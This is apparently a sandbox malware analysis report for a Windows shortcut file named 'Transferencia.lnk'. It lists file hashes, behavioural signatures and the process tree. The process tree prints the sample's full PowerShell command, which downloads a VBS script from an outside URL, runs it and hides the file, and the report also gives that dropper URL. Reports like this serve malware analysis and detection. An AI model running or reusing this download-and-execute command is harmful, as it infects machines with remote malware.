Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
09-12-2024 05:45
Static task
static1
Behavioral task
behavioral1
Sample
Transferencia.lnk
Resource
win7-20240729-en
windows7-x64
6 signatures
150 seconds
General
-
Target
Transferencia.lnk
-
Size
2KB
-
MD5
d860a0bd0c878a590742ccb10f67483b
-
SHA1
f939c3a41ba4b0910e56a7e89923398525dd0f68
-
SHA256
64e8a709f1216e3424fcb496c63f54b8a43d3e51948bb807634cf74be30a2428
-
SHA512
9b6e711503dea81f9b90db103471e3e67708b43065cdbc347726bbd0fd86ade3ff188b017185b7e026cdcabbfe2de75fac3a4fed31a84275a83874000f09c767
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
exe.dropper
https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2220 powershell.exe 6 2220 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2220 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2220 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2220 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2436 wrote to memory of 2220 2436 cmd.exe 32 PID 2436 wrote to memory of 2220 2436 cmd.exe 32 PID 2436 wrote to memory of 2220 2436 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Transferencia.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2436 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass ntjfmdjtginrdfbgfdhozhdfbofdjqop -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2220
-